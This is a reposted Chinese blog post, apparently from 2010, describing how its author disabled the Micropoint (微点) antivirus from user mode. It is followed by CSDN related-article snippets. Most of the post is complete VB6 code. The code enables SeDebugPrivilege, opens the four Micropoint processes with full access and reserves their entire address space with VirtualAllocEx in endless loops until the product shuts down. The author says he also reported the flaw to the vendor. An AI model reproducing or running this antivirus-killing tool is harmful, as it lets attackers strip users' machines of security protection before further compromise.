驱动学习----内存管理漏洞利用之--Ring3下Kill微点

最新推荐文章于 2022-03-25 08:57:41 发布
最新推荐文章于 2022-03-25 08:57:41 发布
阅读量903 收藏
点赞数
分类专栏: Windows 文章标签: kill function token security access integer
本文详细介绍了如何利用微点内存管理方面的漏洞进行杀毒操作,包括提升进程特权级、使用OpenProcess函数打开微点进程、划分地址空间直至保留所有空间,最终导致微点进程退出。文中提供了VB代码实现这一过程,包括获取当前进程令牌、调整特权、查找并应用调试特权、查找内核函数等关键步骤。
摘要由CSDN通过智能技术生成

from:http://blog.sina.com.cn/s/blog_61d65e360100l709.html

驱动学习----内存管理漏洞利用之--Ring3下Kill微点

(2010-08-26 10:02:49)
转载

Ring3下Kill微点主动防御软件

2010年8月24笔者发现微点在内存管理方面存在漏洞,黑客可以利用几个很常用的win32 API函数就可以结束掉其4大进程。笔者通宵写出了微点专杀工具。当然也第一时间通过邮件的方式告知微点弥补其漏洞。

同时感谢我的搭档---LiuFei


笔者使用的技术很简单
1,我们先来看下微点有哪几个进程,哦,原来就4个,其中3个是系统进程
2,因此有必要提升下自己进程的特权级,使其具备Debug效能
3,试图用OpenProcess打开微点进程,OK,特权级提升之后可以全部打开
4,试图用VirtualAllocEx划分一个地址空间看看,哈哈 令人兴奋的是居然成功
5,既然你微点没有Inline Hook相关内核函数,那么我就对不起你了
6,暴力无限划分,直到所有地址空间全部被“保留”
7,等3分钟,左右,微点4个进程全部退出,win7提示微点退出
8,成功~ 这就是思路。简单吧。

为了提高编程效率,我选择了VB 具体代码如下
窗口代码:

Private Sub Form_Initialize()
Call searchMP
End Sub

Private Sub Form_Load()
Dim currentprocess As Long
Dim a As Long
Dim retlen As Long
Dim tkp As TOKEN_PRIVILEGES
Dim oldtkp As TOKEN_PRIVILEGES
'*******************************************
currentprocess = GetCurrentProcess()
a = OpenProcessToken(currentprocess, TOKEN_ADJUST_PRIVILEGES + TOKEN_QUERY, CurrentProcessToken)
If a = 0 Then
MsgBox ("OpenProcessToken failed!")
End If

a = LookupPrivilegeValue("", "SeDebugPrivilege", CurrentProcessLuid)
If a = 0 Then
MsgBox ("Catch Luid failed!")
End If
'***********************************************
tkp.PrivilegeCount = 1
tkp.Privileges(0).Attributes = SE_PRIVILEGE_ENABLED
tkp.Privileges(0).pLuid.highpart = CurrentProcessLuid.highpart
tkp.Privileges(0).pLuid.lowpart = CurrentProcessLuid.lowpart


a = AdjustTokenPrivileges(CurrentProcessToken, False, tkp, LenB(oldtkp), oldtkp, retlen)
If a = 0 Then
MsgBox ("Adjust failed!")
End If

End Sub

以下是模块代码:

Public Declare Function CreateThread Lib "kernel32" (lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal dwStackSize As Long, lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long
Public Declare Function GetCurrentProcess Lib "kernel32" () As Long
Public Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Public Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, _
ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, _
ByVal flProtect As Long) As Long
Public Declare Function LookupPrivilegeValue Lib "advapi32.dll" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLuid As LARGE_INTEGER) As Long
Public Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long
Public Declare Function AdjustTokenPrivileges Lib "advapi32.dll" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As TOKEN_PRIVILEGES, ReturnLength As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Public Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long
Public Declare Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, lppe As PROCESSENTRY32) As Long
Public Declare Function Process32Next Lib "kernel32" (ByVal hSapshot As Long, lppe As PROCESSENTRY32) As Long
'*******************************************
Public Const ANYSIZE_ARRAY = 1
Public Const TOKEN_ADJUST_PRIVILEGES = &H20
Public Const TOKEN_QUERY = &H8
Public Const SE_DEBUG_NAME = "SeDebugPrivilege"
Public Const SE_PRIVILEGE_ENABLED = &H2
Public Const PROCESS_ALL_ACCESS = &H1F0FFF
Public Const MEM_RESERVE = 4096
Public Const PAGE_READWRITE = 4
'**********************************************
Public CurrentProcessToken As Long
Public CurrentProcessLuid As LARGE_INTEGER
'###################
Public MP1 As String
Public MP2 As String
Public MP3 As String
Public MP4 As String

Public MP1ID As Long
Public MP2ID As Long
Public MP3ID As Long
Public MP4ID As Long

Public hMP1 As Long
Public hMP2 As Long
Public hMP3 As Long
Public hMP4 As Long

Public AllocMP1 As Long
Public AllocMP2 As Long
Public AllocMP3 As Long
Public AllocMP4 As Long
'###################
Public Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type
Public Type ACL
AclRevision As Byte
Sbz1 As Byte
AclSize As Integer
AceCount As Integer
Sbz2 As Integer
End Type
Public Type SECURITY_DESCRIPTOR
Revision As Byte
Sbz1 As Byte
Control As Long
Owner As Long
Group As Long
Sacl As ACL
Dacl As ACL
End Type

Public Type LUID
lowpart As Long
highpart As Long
End Type
Public Type LARGE_INTEGER
lowpart As Long
highpart As Long
End Type
Public Type LUID_AND_ATTRIBUTES
pLuid As LUID
Attributes As Long
End Type
Public Type TOKEN_PRIVILEGES
PrivilegeCount As Long
Privileges(ANYSIZE_ARRAY) As LUID_AND_ATTRIBUTES
End Type
'*************************************************
Public Const PROCESS_VM_READ = &H10
Public Const TH32CS_SNAPPROCESS = &H2
Public Const MEM_DECOMMIT = &H4000
Public Const PROCESS_Create_THREAD = (&H2)
Public Const PROCESS_VM_OPERATION = (&H8)
Public Const PROCESS_VM_WRITE = (&H20)
Public Const INFINITE = &HFFFF

Public Type PROCESSENTRY32
dwSize As Long
cntUseage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
swFlags As Long
szExeFile As String * 1024
End Type

Function searchMP()
Dim MySnapHandle As Long
Dim ProcessInfo As PROCESSENTRY32
Dim MyRemoteProcessId As Long
Dim a As Long

MP1 = "MPMon.exe"
MP2 = "MPSVC.exe"
MP3 = "MPSVC1.exe"
MP4 = "MPSVC2.exe"
MySnapHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
ProcessInfo.dwSize = Len(ProcessInfo)
If Process32First(MySnapHandle, ProcessInfo) <> 0 Then
Do
If InStr(ProcessInfo.szExeFile, MP1) > 0 _
Or InStr(ProcessInfo.szExeFile, MP2) > 0 _
Or InStr(ProcessInfo.szExeFile, MP3) > 0 _
Or InStr(ProcessInfo.szExeFile, MP4) > 0 Then
Form1.List1.AddItem (ProcessInfo.szExeFile)
Form1.List2.AddItem (ProcessInfo.th32ProcessID)
If InStr(ProcessInfo.szExeFile, MP1) > 0 Then
MP1ID = ProcessInfo.th32ProcessID
hMP1 = OpenProcess(PROCESS_ALL_ACCESS, 0, MP1ID)
If hMP1 = 0 Then
MsgBox ("Open the MPMon.exe failed !!")
End If
End If

If InStr(ProcessInfo.szExeFile, MP2) > 0 Then
MP2ID = ProcessInfo.th32ProcessID
hMP2 = OpenProcess(PROCESS_ALL_ACCESS, 0, MP2ID)
If hMP2 = 0 Then
MsgBox ("Open the MPSVC.exe failed !!")
End If
End If

If InStr(ProcessInfo.szExeFile, MP3) > 0 Then
MP3ID = ProcessInfo.th32ProcessID
hMP3 = OpenProcess(PROCESS_ALL_ACCESS, 0, MP3ID)
If hMP3 = 0 Then
MsgBox ("Open the MPSVC1.exe failed !!")
End If
End If

If InStr(ProcessInfo.szExeFile, MP4) > 0 Then
MP4ID = ProcessInfo.th32ProcessID
hMP4 = OpenProcess(PROCESS_ALL_ACCESS, 0, MP4ID)
If hMP4 = 0 Then
MsgBox ("Open the MPSVC2.exe failed !!")
End If
End If
End If
Loop While Process32Next(MySnapHandle, ProcessInfo) <> 0
End If
CloseHandle MySnapHandle
'***************************
Call AllocMemMP
End Function

Function AllocMemMP()
Dim x As Long
Dim newthreadid As Long
Dim attr As SECURITY_ATTRIBUTES
Dim sd As SECURITY_DESCRIPTOR
attr.nLength = LenB(attr)
attr.bInheritHandle = 0
attr.lpSecurityDescriptor = VarPtr(sd) '取地址
attr.bInheritHandle = 0

If hMP1 <> 0 And hMP2 <> 0 And hMP3 <> 0 And hMP4 <> 0 Then
x = CreateThread(attr, 0, StartAllocMP1, 0, 0, newthreadid) 'varptr 针对于any类型数据
x = CreateThread(attr, 0, StartAllocMP2, 0, 0, newthreadid)
x = CreateThread(attr, 0, StartAllocMP3, 0, 0, newthreadid)
x = CreateThread(attr, 0, StartAllocMP4, 0, 0, newthreadid)
Else
MsgBox ("One of the four processes of the MP AutiVirus have not been opened !!!")
End If
End Function

Function StartAllocMP1()
AllocMemSizeOne = 50000000
AllocMemSizeTwo = 500
Do
AllocMP1 = VirtualAllocEx(hMP1, 0, AllocMemSizeOne, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP1 > 0
Do
AllocMP1 = VirtualAllocEx(hMP1, 0, AllocMemSizeTwo, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP1 > 0
MsgBox ("MPMon.EXE has been Alloc !!")
End Function

Function StartAllocMP2()
AllocMemSizeOne = 50000000
AllocMemSizeTwo = 500
Do
AllocMP2 = VirtualAllocEx(hMP2, 0, AllocMemSizeOne, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP2 > 0
Do
AllocMP2 = VirtualAllocEx(hMP2, 0, AllocMemSizeTwo, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP2 > 0
MsgBox ("MPSVC.EXE has been Alloc !!")
End Function

Function StartAllocMP3()
AllocMemSizeOne = 50000000
AllocMemSizeTwo = 500
Do
AllocMP3 = VirtualAllocEx(hMP3, 0, AllocMemSizeOne, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP3 > 0
Do
AllocMP3 = VirtualAllocEx(hMP3, 0, AllocMemSizeTwo, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP3 > 0
MsgBox ("MPSVC1.EXE has been Alloc !!")
End Function

Function StartAllocMP4()
AllocMemSizeOne = 50000000
AllocMemSizeTwo = 500
Do
AllocMP4 = VirtualAllocEx(hMP4, 0, AllocMemSizeOne, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP4 > 0
Do
AllocMP4 = VirtualAllocEx(hMP4, 0, AllocMemSizeTwo, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP4 > 0
MsgBox ("MPSVC2.EXE has been Alloc !!")
End Function

以下是截图:

驱动学习----内存管理漏洞利用之--Ring3下Kill微点

驱动学习----内存管理漏洞利用之--Ring3下Kill微点

驱动学习----内存管理漏洞利用之--Ring3下Kill微点

驱动学习----内存管理漏洞利用之--Ring3下Kill微点

驱动学习----内存管理漏洞利用之--Ring3下Kill微点

后续:

当然,微点肯定会弥补这个漏洞。因此这个方法会在将来某一天无效!!!!

好了,继续睡觉去

kendyhj9999
关注
专栏目录
内存修改(Ring3)
KOOKNUT的博客
04-08 600
Ring3对目标进程的内存进行修改,说一下实现思路: (1)调用GetSystemInfo函数得到系统信息,将应用层程序最大地址和页面大小保存到全局变量中 (2)通过目标进程的进程名得到目标进程ID 拍摄进程快照CreateToolhelp32Snapshot 遍历ProcessEntry,进行字符串比较,匹配成功周,取出ID值,返出。 (3)提权,根据目标进程ID打开进程,得到进程ID。 (...
RING3下 内存清零法 杀进程
wowbell的专栏
01-27 5887
<br />在一般任务管理器无法关闭进程时用到<br />内存清零法 杀进程 原理分析<br />1.先打开CSRSS.EXE系统进程,获得其句柄,几乎系统所有的HANDLE结构体中,里面的ProcessId都是指向csrss.exe的,利用它的PID来进行遍历进程实现过滤。<br /><br />2.分配好一块内存空间Buffer,用来存储SystemHandleInformation系统句柄信息<br /><br />3.通过ZwQuerySystemInformation函数来查询系统句柄信息并保存在
ucos linux 内存管理,ucosII在动态内存管理漏洞
weixin_29802461的博客
05-02 140
【实例简介】本例发现了ucosII在动态内存管理方面的漏洞,动态内存块可以归还到不同的内存分区。【实例截图】TEST交叉使用.C【核心代码】panalog = (ANALOG *)OSMemGet(BnaPtr, &err);if (err == OS_NO_ERR){panalog->ticks = OSTimeGet();panalog->channel = 10;pa...
为什么“内存管理”漏洞值得你的绝对关注!
Xcalibyte的博客
06-30 198
在IT业务环境中,客户数据是关注的焦点。因此,保护客户数据自然是任何IT专业人员最重要的责任。许多国家或组织已经立法要求,数据在静态存储和移动过程中必须为加密状态。这会使许多人觉得如果IT系统符合法律要求,数据就是安全的。实际情况是数据在CPU操作期间依然需要被解密。因此,需要密码和密钥才能启用数据加密和解密。除此之外,数据管理员还需要能够在用户丢失密码或密钥时恢复数据。总之,数据在解密状态期间,以及所有处于解密和加密状态转换期间,容易被黑客恶意利用。 让我们重点关注一下解密状态下的数据。用户的密码或..
Rt-thead studio软件下使用ringbuffer
04-21
通过理解并熟练应用上述知识点,开发者可以在RT-Thread Studio环境下高效地利用RingBuffer解决实际问题,提升系统性能。在实际项目中,务必根据需求进行适当的优化和调整,确保RingBuffer的使用既安全又高效。
mimo.rar_in_mimo_one ring_one-ring_one-ring model
09-20
"one-ring_one-ring model" 是一种用于描述MIMO系统中无线传播特性的模型,它简化了复杂的真实环境,以便更好地理解和分析MIMO系统的性能。 在MIMO系统中,多个天线同时用于发送和接收信号,这极大地提高了频谱效率...
ring3-kit:使用NT API挂钩从任务管理器隐藏进程(NtQuerySystemInformation)
05-27
一个简单的Ring-3(用户模式)rootkit。 如何 将API函数NtQuerySystemInformation()与我们自己的函数挂钩,该函数对任务管理器隐藏进程 挂钩函数被调用 DLL被注入Taskmgr.exe,因此有一个虚拟内存空间可用于执行...
ring-basic-authentication:强制执行基本身份验证的环形中间件
01-29
下面将详细介绍Ring、Clojure、基本身份验证以及如何使用Ring-Basic-Authentication中间件。 **Ring概述** Ring是Clojure Web开发的核心组件,它提供了一个简洁的API来处理HTTP请求和响应。Ring不直接构建完整的Web...
python-ring-doorbell:Python Ring Door Bell是一个用Python 3编写的库,它将Ring.com设备公开为Python对象。
05-12
Python环门铃 ... git+https://github.com/tchellomello/python-ring-doorbell@master 初始化您的Ring对象 import json import getpass from pathlib import Path from pprint import pprint from ring_do
Ring3下实现进程保护,不用hook
十年磨一剑,霜刃未曾试!
05-04 6977
今天在分析一款木马的时候,发现做了进程保护,没加驱动,也没做hook,能做进程保护,感觉非常奇怪,原来是这么一回事,mark一下吧! #include "stdafx.h" #include #include #pragma comment(lib,"Advapi32.lib") BOOL Ring3ProtectProcess() { HANDLE hProcess = ::Get
Ring3结束进程的方法汇总
多媒体编程、网络编程、系统编程、网络安全编程、驱动编程
07-27 1042
所有的 OpenProcess/ZwOpenProcess/OpenThread/ZwOpenThread 都可以替换为 ZwQuerySystemInformation->ZwOpenProcess->ZwDuplicateObject 。具体是为什么请自己研究。 (Zw)OpenProcess(PID+0/1/2/3)->(Zw)TerminateProcess (Zw)OpenProce
290-内存管理的安全问题
LINZEYU666的博客
04-22 577
安全问题 内存和虚拟内存是容易受到安全威胁的系统资源,因此需要采取一些安全对策来保护它们。最明显的安全需求是防止进程内存中的内容遭受未授权访问。如果进程没有声明共享其部分内存,则其他程序不得访问这部分内存内容。如果进程声明其某部分内存可以被指定程序共享,那么操作系统的安全服务必须保证只有这些指定进程可以访问这部分内存。 缓冲区溢出攻击 这是一种内存管理的很严重的安全威胁:缓冲区溢出,也叫内存越界,NIST(美国国家标准技术研究院)的关键信息安全术语词汇表中对其定义如下: 缓冲区溢出:输入到一个缓冲区或者数据
Linux内核内存管理漏洞利用
有价值炮灰
03-21 510
本文主要介绍Buddy System、Slab Allocator的实现机制以及现实中的一些漏洞利用方法,从攻击者角度加深对Linux内核内存管理机制的理解。
“小狗上学”病毒 解析(帮你认识病毒与注册表)
dreamon_xq的专栏
04-09 813
这是一个使用VB编写的病毒。可以通过U盘等移动存储传播。修改可执行文件图标,映像劫持杀毒软件...1.病毒启动后,释放如下文件或者副本%systemroot%/system32/soleboy.exe%systemroot%/system32/soleboy.txt各个分区根目录下生成soleboy.exe和autorun.inf达到随移动存储传播的目的。2.试图结束一些安全工具的进程比如proc
ring3层恶意代码实例汇总
hl1293348082的专栏
03-25 760
之前一期我们学习了 IAT 的基本结构,相信大家对 C++ 有了一个基本的认识,这一期放点干货,我把 ring3 层恶意代码常用的编程技术给大家整理了一下,所有代码都经过我亲手调试并打上了非常详细的注释供大家学习,如下图: 我会在其中挑出几个,采用反汇编的方式,给大家展示恶意代码的执行流程以及原理,由于 ring3 层的技术过于古老,希望大家秉着学习和巩固的心态来看待该文章。 一共九种技术,十套源代码,分两期向大家介绍编程相关思路,希望大家与我一起学习,共同进步。 源码下载地址(稍后会把源码上传到
经典内存漏洞简述
weixin_43926330的博客
11-11 1879
Type confusion 类型混乱确实是一个很有趣也是很精巧的一个内存漏洞。而type confusion导致RCE(remote code execution)在最近几年也多了起来。 其实就像是控制流劫持(control flow hijack)对象强制类型转换后导致虚拟页表的混乱,本来p类不能使用的经过强制类型转换后,可以使用d类的虚函数表并使用其中的函数。 具体到程序中的实际使用情况...
MATLAB-四连杆机构的仿真+项目源码+文档说明
最新发布
11-17
<项目介绍> - 四连杆机构的仿真 --m3_1.m: 位置问题求解 --m2_1.m: 速度问题求解 --FourLinkSim.slx: Simlink基于加速度方程的仿真 --FourLinkSim2.slx: Simscape简化模型仿真 --FourLinkSim3.slx: Simscape CAD模型仿真 - 不懂运行,下载完可以私聊问,可远程教学 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 --------
混合内在映射的3-D网格密集匹配算法
在计算机视觉领域,3-D网格的密集对应匹配是核心问题之一,它对于三维重建、物体识别和运动估计等多个任务至关重要。本文介绍的算法创新地解决了非等距曲面之间的匹配难题。混合内在映射的概念是指在两个几何形状...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值